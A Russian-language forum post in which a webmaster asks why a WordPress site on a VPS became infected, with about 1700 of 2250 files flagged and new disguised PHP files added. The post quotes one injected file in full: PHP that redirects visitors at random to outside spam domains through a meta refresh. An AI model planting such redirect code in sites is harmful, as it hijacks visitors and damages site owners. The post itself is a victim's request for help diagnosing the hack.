Ситуация следующая: есть у меня гс-к на вп под адмитад, висит на камале впс вместе с еще двумя под прон. Три дня назад он у меня упал с белой страничкой, сегодня начал лечить стандартным способом и вылезший из небытия каспер вдруг обнаружил из 2250 файлов, аж 1700 зараженных...
Два других сайта не заражены. Соб-но вопрос: куда капать? Сторонних плагинов нет, сервисы никакие не используются. Файлы движка не правились, но добавилось десяток новых evening.php, exactly.php, fine.php и тд (невидимки прям, .лять) в основном с содержанием
<?php
$target_urls = array (
'http://com-czd.net/?a=314759&c=wl_con&s=ALL',
'http://com-h8g.net/?a=314759&c=wl_con&s=ALL',
'http://com-tii.net/?a=314759&c=wl_con&s=ALL',
);
$n = mt_rand(0,count($target_urls)-1);
$rand_url=$target_urls[$n];
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">
Остальные стандартное перенаправление и адблоки, а вот как эта хрень работает мне не понятно.
|